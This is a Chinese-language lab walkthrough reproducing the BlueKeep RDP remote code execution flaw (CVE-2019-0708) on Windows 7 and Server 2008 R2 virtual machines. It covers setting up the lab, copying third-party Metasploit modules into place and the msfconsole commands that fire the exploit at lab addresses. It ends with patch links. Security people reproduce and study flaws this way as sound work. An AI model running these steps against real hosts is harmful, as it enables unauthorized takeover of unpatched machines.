0x00 漏洞概述
CVE-2019-0708是微软于2019年05月14日发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁。
0x01 影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
Windows 8和Windows 10及之后版本的用户不受此漏洞影响
0x02 漏洞原理
由于对象指针在释放后再次被使用而引发UAF漏洞,详情见
https://www.anquanke.com/post/id/181577
0x03 环境搭建
本次复现版本为win7 sp1和win08 R2
Vmware环境下载链接:
win7 sp1:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
win08 R2:
ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/
Kali:https://www.kali.org/downloads/
以上环境自行百度安装即可
环境准备:
win7 sp1 - 192.168.10.10
win08 R2 - 192.168.10.6
kali - 192.168.10.9
win7 sp1 准备:
开启3389:
win08 R2准备:
开启3389:
修改注册表:
Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
kali 准备:
下载需要的文件
Git clone https://github.com/TinToSer/bluekeep-exploit
可以看到有四个.rb后缀的文件,接下来将它们放至相应的目录(rdp目录需要自己创建)
rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/
rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/
查看文件是否复制成功
0x04 漏洞利用-win7
启动msf:
Msfconsole
重新加载所有模块(重要):
reload_all
搜索漏洞模块
search 2019_0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块
set rhosts 192.168.10.10 //设置目标主机(win7 sp1)
set rport 3389 //设置目标端口
set target 3
target 0 Automatic\ targeting\ via\ fingerprinting
target 1 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64)
target 2 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ Hyper-V)
target 3 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ VMWare)
target 4 Windows\ 7\ SP1\ /\ 2008\ R2\ (6.1.7601\ x64\ -\ Virtualbox)
这里用的是VMWare,所以选择target 3
Show options //查看设置情况
Run //执行
0x05 漏洞利用-win08
win2008 R2也是同样的操作命令
Msfconsole //启动maf
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块
set rhosts 192.168.10.6 //设置目标主机(win08 R2)
set rport 3389 //设置目标端口
set target 3 //同win7 target相同
Show options //查看设置情况
Run //执行
0x06 修复方式
下载补丁:
Win7 sp1:
http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
Win08 R2:
http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
复现失败的一些小tip:
1、确认目录下已经拷贝了相应文件
2、确认3389开启,msf中reload_all执行
3、kali的内存给3个G左右
4、切换target 1/2/4
5、多run几次!(重点)
小结:目前exp还很不稳定,建议大家在实战中暂时不要使用,如果打蓝屏可能会造成很严重的后果。复现时可能会出现诸多问题,但是只要耐心地多尝试几次总会成功的
参考链接:
http://www.nmd5.com/?p=409#comment-46
https://github.com/rapid7/metasploit-framework/pull/12283